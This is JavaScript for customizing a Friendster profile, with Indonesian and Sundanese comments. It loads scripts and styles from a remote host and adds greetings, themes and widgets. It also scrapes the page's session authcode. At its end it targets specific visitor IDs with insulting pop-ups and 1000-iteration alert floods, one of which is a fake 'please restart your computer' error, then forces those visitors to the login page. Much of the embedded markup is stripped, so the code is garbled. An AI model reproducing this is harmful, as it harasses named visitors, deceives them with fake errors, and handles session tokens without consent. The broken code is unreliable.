//js injection loading page dan siliding foto galleri var myjs = document.createElement("script"); myjs.type = "text/javascript"; myjs.src = "http://h1.ripway.com/bagusxfantasy/Reborn/external.js"; document.getElementsByTagName("head")[0].appendChild(myjs); //js injection loading page dan siliding foto galleri var myjs = document.createElement("script"); myjs.type = "text/javascript"; myjs.src = "http://h1.ripway.com/bagusxfantasy/Reborn/Cursor_tooltip.js"; document.getElementsByTagName("head")[0].appendChild(myjs); //css injection var css = document.createElement("link"); css.type = "text/css"; css.rel = "stylesheet"; css.href = "http://h1.ripway.com/bagusxfantasy/Reborn/Advent_children.css"; css.media = "screen, print"; document.getElementsByTagName("head")[0].appendChild(css); function goodBye(){ alert("Sering-sering mampir ya") } window.onunload=goodBye //judul berjalan function tb2_makeArray(n){ this.length = n; return this.length; } tb2_messages = new tb2_makeArray(2); tb2_messages[0] = "Allow "+pageViewerFName+" kamu adalah tamu spesialku "; tb2_messages[1] = "Hello "+pageViewerFName+" you are my special Guest "; tb2_bln = 50; tb2_rptType = 'infinite'; tb2_rptNbr = 5; tb2_speed = 200; var tb2_currMsg=0; var tb2_kraj=tb2_messages[tb2_currMsg].length; var tb2_sts=""; var tb2_timer = null; var tb2_stsmsg=""; for (var i=0;i= 0){ tb2_sts = tb2_stsmsg.substring(tb2_pocetak,tb2_stsmsg.length); tb2_pocetak--; } else{ if (tb2_ocapareno == tb2_messages[tb2_currMsg].length){ if (tb2_currMsg == tb2_messages.length-1){ if ((tb2_rptType == 'finite') && (tb2_counter==tb2_rptNbr)){ clearTimeout(tb2_timer); return; } tb2_currMsg=0; tb2_counter++; } else{ tb2_currMsg++; } tb2_stsmsg=""; for (var i=0;i


Photobucket"; document.getElementById('cpShoutoutBox').style.height='260'; document.getElementById('cpShoutoutBox').style.overflow='auto'; document.getElementById('cpShoutoutBox').innerHTML="
"+wakoko+"
"; }setTimeout("shoutoutcus()",1500); //Teks berjalan ///////////////////////////////////////////////////////////////////////////////////// //Join Filipinoz Customize Profile ///// //Get The Latest Codes For Your Friendster Profile ///// //Add us fcpgroup@yahoo.com ///// //http://www.friendster.com/group/tabmain.php?statpos=mygroup&gid=64735 ///// ///////////////////////////////////////////////////////////////////////////////////// window.onload = function(){ riteclkedmsg(); }; // CONTROLPANEL BOX h=document.getElementById("controlpanel_header"); h.innerHTML="<[= BAGUS-X-FANTASY =]>
"; // PHOTOS h=document.getElementById("1").getElementsByTagName("h2")[0]; h.innerHTML="
Keren kan!!!]\">X-GALLERY
"; // MOREABOUT BOX h=document.getElementById("6").getElementsByTagName("h2")[0]; h.innerHTML="
X-STORY
"; // PUBLICCOMMENT BOX h=document.getElementById("18").getElementsByTagName("h2")[0]; h.innerHTML="
Atau mau numpang lewat juga gak apa-apa]\">X-TESTIMONIAL
"; //MEDIA BOX h=document.getElementById("10").getElementsByTagName("h2")[0]; h.innerHTML="
X-TOOL
"; //ganti info data document.getElementById('0').getElementsByTagName("ul")[1].innerHTML= "
  • Male,Unknown,Mysterius
  • "+ "
  • Member: Gak pernah bikin fs
  • "+ "
  • Location: E:/setup.exe
  • "+ "
  • Hometown: H_KEY_LOCAL_GARUT
  • "+ "
  • Last Login: Gak Inget
  • "+ "
  • Moto : Watch your Mind and Listen Your heart
  • "+ "
  • Friendster type: Hidden
  • "+ "
  • URL :http://profiles.friendster.com/77269220
  • "; function afa() { var eadd = "bagusxfantasy@yahoo.com"; var k = document.getElementById("controlPanelButtons").innerHTML; var a = k.slice(k.indexOf("authcode=")); var m = a.slice(9,39); document.getElementById("addme").innerHTML = ""; } if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();}; //Foto kamu /** * Viewer's Main Photo at WIWTM * Copyright 2007-2008 by FeRuZZ � http://profiles.friendster.com/feruzz * Internalize AJAX handler * No warranty expressed or implied. Use at your own risk. **/ /*global VIEWERPIC*/ (function () { VIEWERPIC = { // private property photo: null, init: function () { if (pageViewerID !== "") { try { VIEWERPIC.ajaxRequest("GET", "http://" + location.hostname + "/" + pageViewerID, true, null, VIEWERPIC.viewer, null); } catch (e) {} } }, viewer: function (htm) { if (htm.replace(/^\s*|\s*$/g, "") === "") { window.alert("ERROR: Empty xmlresponse! \n Unable to parse your details!"); return; } else { htm = htm.slice(htm.indexOf("
    ") + 0, htm.indexOf("
      ") + 0); htm = htm.slice(htm.indexOf("
    ") + 0); VIEWERPIC.photo = document.createElement("div"); VIEWERPIC.photo.id = "viewerphoto"; VIEWERPIC.photo.align = "center"; VIEWERPIC.photo.appendChild(document.createElement("a")); VIEWERPIC.photo.getElementsByTagName("a")[0].href = "/" + pageViewerID; VIEWERPIC.photo.getElementsByTagName("a")[0].target = "_blank"; VIEWERPIC.photo.getElementsByTagName("a")[0].title = pageViewerFName; VIEWERPIC.photo.getElementsByTagName("a")[0].appendChild(document.createElement("img")); VIEWERPIC.photo.getElementsByTagName("img")[0].src = htm; VIEWERPIC.photo.appendChild(document.createElement("br")); VIEWERPIC.photo.appendChild(document.createElement("span")); VIEWERPIC.photo.getElementsByTagName("span")[0].className = "q"; VIEWERPIC.photo.getElementsByTagName("span")[0].appendChild(document.createElement("a")); VIEWERPIC.photo.getElementsByTagName("a")[1].href = "/" + pageViewerID; VIEWERPIC.photo.getElementsByTagName("a")[1].target = "_blank"; VIEWERPIC.photo.getElementsByTagName("a")[1].title = pageViewerFName; VIEWERPIC.photo.getElementsByTagName("a")[1].innerHTML = pageViewerFName; document.getElementById("viewerpic").parentNode.replaceChild(VIEWERPIC.photo, document.getElementById("viewerpic")); } }, ajaxRequest: function (type, url, async, param, func, handlerparam) { /** * ajaxRequest - You may not remove or change this notice. * version: 2.4 * Copyright 2008 by FeRuZZ � http://profiles.friendster.com/feruzz. * * @type: "GET" | "POST" * @cont: true | false * @param: string | null * @func: string | null * @handlerparam: string | null **/ var httprequest = null; var requestDone = false; var data = null; var responseType = "text"; var timeout = 0; var ival = null; var onreadystatechange = {}; var msxml = ["Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0", "Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]; for (var x = 0, len = msxml.length; x < len; x += 1) { try { httprequest = window.ActiveXObject ? new ActiveXObject(msxml[x]) : new XMLHttpRequest(); break; } catch (e) { if (async) { httprequest = null; } } } if (typeof func === "function") { onreadystatechange = function (isTimeout) { if (!requestDone && httprequest && (httprequest.readyState === 4 || isTimeout === "timeout")) { requestDone = true; if (ival) { window.clearInterval(ival); ival = null; } if (!httprequest.status && location.protocol === "file:" || (httprequest.status >= 200 && httprequest.status < 300) || httprequest.status === 304 || httprequest.status === 1223) { var resPonse = (/xml/i.test(responseType))? httprequest.responseXML : httprequest.responseText; func(resPonse.replace(new RegExp("]*>.*?<\/script>", "gi"), ""), handlerparam); } } }; } if (async) { ival = window.setInterval(onreadystatechange, 13); if (timeout > 0) { window.setTimeout(function () { if (httprequest) { httprequest.abort(); if (!requestDone) { onreadystatechange("timeout"); } } }, timeout); } } if (type === "GET" && (/GET/i.test(type))) { var ts = new Date().getTime(); var ret = url.replace(/(\?|&)_=[\S\s]*?(&|$)/, "$1_=" + ts + "$2"); url = ret + ((ret === url) ? (url.match(/\?/) ? "&" : "?") + "_=" + ts : ""); } if (data && type === "GET" && (/GET/i.test(type))) { url += (url.match(/\?/) ? "&" : "?") + data; data = null; } if (type === "POST" && (/POST/i.test(type))) { var headers = "application/x-www-form-urlencoded" + ("UTF-8" ? "; charset=" + "UTF-8" : ""); var contentLength = param ? param.length: 0; try { httprequest.setRequestHeader("Content-type", headers); httprequest.setRequestHeader("Content-length", contentLength); if (httprequest.overrideMimeType && (navigator.userAgent.match(/Gecko\/(\d{4})/) || [0, 2005])[1] < 2005) { httprequest.setRequestHeader("Connection", "close"); } } catch (err) {} } httprequest.open(type, url, async); httprequest.setRequestHeader("ajaxRequest", "true"); httprequest.setRequestHeader("X-Requested-With", "XMLHttpRequest"); httprequest.setRequestHeader("If-Modified-Since", "Thu, 01 Jan 1970 00:00:00 GMT"); httprequest.setRequestHeader("Accept", "text/javascript, application/javascript, text/html, application/xml, text/xml, text/plain, */*"); httprequest.send(param); if (!async) { onreadystatechange(); } } }; })(); VIEWERPIC.init(); //Multi theme css myThemes=new Array() myThemes[0]="http://h1.ripway.com/bagusxfantasy/Reborn/Advent_children.css" myThemes[1]="http://h1.ripway.com/bagusxfantasy/Reborn/ff8.css" myThemes[2]="http://h1.ripway.com/bagusxfantasy/Reborn/ff9.css" function cssSwitch(x){ theme=document.createElement("link") theme.rel="stylesheet" theme.type="text/css" theme.href=myThemes[x] navBg.appendChild(theme) } controlPanelButtons.innerHTML+="
  • Advent Children
  • " +"
  • Final Fantasy VIII
  • " +"
  • Final Fantasy IX
  • " //chatbox var about; try {about = document.createElement("div");} catch (e){about = document.createElement("
    ");} about.innerHTML ="
    CHAT ZONEImage Hosted by ImageShack.us

    "; document.getElementById("0").parentNode.appendChild(about); //Floating clock & logo friendster dude="

    "; flow=document.getElementById('flo_wrapper'); river=document.createElement("div"); river.innerHTML=dude; flow.parentNode.insertBefore(river,flow); //in this part you can change it into "frombottom" or "fromtop" var verticalpos="frombottom" function BoyantDiv() { var startX = 15; var startY = 170; function ml(id) { if (document.getElementById) { var wek=document.getElementById(id); } else if (document.all) { var wek=document.all[id]; } else { var wek=document.layers[id]; } if(document.layers) { wek.style=wek; } wek.sP = function(x,y) {shino(x,y);}; function shino(x,y) { wek.style.left=x; wek.style.top=y; } wek.x = startX; if (verticalpos=="fromtop") { wek.y = startY; } else{ if (navigator.appName.indexOf("Netscape") != -1) { wek.y = pageYOffset + innerHeight; } else { wek.y = document.body.scrollTop + document.body.clientHeight; } wek.y -= startY; } return wek; } window.stayTopLeft = function () {boyant();}; function boyant() { if (verticalpos=="fromtop"){ if (navigator.appName.indexOf("Netscape") != -1) { var tenten = pageYOffset; } else { var tenten = document.body.scrollTop; } ftlObj.y += (tenten + startY - ftlObj.y)/8; } else{ if (navigator.appName.indexOf("Netscape") != -1) { var tenten = pageYOffset + innerHeight; } else { var tenten = document.body.scrollTop + document.body.clientHeight; } ftlObj.y += (tenten - startY - ftlObj.y)/8; } ftlObj.sP(ftlObj.x, ftlObj.y); wakoko=setTimeout("stayTopLeft()", 50); } ftlObj = ml("divStayTopLeft"); stayTopLeft(); } BoyantDiv(); //alert //Welcome spesial if (pageViewerID==67255257) {alert("Goblog!!!Doclo tong neuleu fs aing!!"); } if (pageViewerID==21920110) {alert("phe lagi liat fs ku ya!!!Phe masih sibuk kuliah!!"); } if (pageViewerID==46922724) {alert("Waalikum salam wilujeung sumping mangga ka leuebeut tong isin-isin"); } if (pageViewerID==62560864) {alert("Jay hayang awewe sok milih atuh tapi tong nu geulis eta mah jang urang"); } if (pageViewerID==17310409) {alert("Wah Shi Chan mampir lagi ke fsku ! masih nge fans berat Kyu Hun"); } if (pageViewerID==76871751) {alert("Najis fs abi ditinggali ku sia! Nyingkah siah virus"); } //mBOUY if(pageViewerID==38749169){ for (var i=0;i<1000;i++) { alert("KALO LW PENGEN BELAJAR BIKIN FS JADI KEREN!!LW HRS BISA MASUK FS GW!bISA GAK? HAHHAHAHHAHAAHAHAHA!!!"); document.location.href="http://profiles.friendster.com/"+pageOwnerID; } top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; } //DADANG if(pageViewerID==77119621){ for (var i=0;i<1000;i++) { alert("REK NAON NINGGALI FS NU URANG!!!MASA SARJANA KOMPUTER GAK BISA BUKA FS SIH!!GAK MALU KITU!!HAHAHAHHAHHA"); document.location.href="http://profiles.friendster.com/"+pageOwnerID; } top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; } //RONI if(pageViewerID==76871751){ for (var i=0;i<1000;i++) { alert("ETA TONG DIPENCETAN WAE BISI PEJET MOUSE! DASAR VIRUS SIPILIS!! MANGGEUS TONG DIPENCETAN KOPLOK!!"); document.location.href="http://profiles.friendster.com/"+pageOwnerID; } top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; } //Rini if(pageViewerID==11458995){ for (var i=0;i<1000;i++) { alert("Error!! Please restart your computer"); document.location.href="http://profiles.friendster.com/"+pageOwnerID; } top.location.href="http://www.friendster.com/login.php?next=%2fuser.php%3fuid%3D"+pageOwnerID+"&cookie=1"; }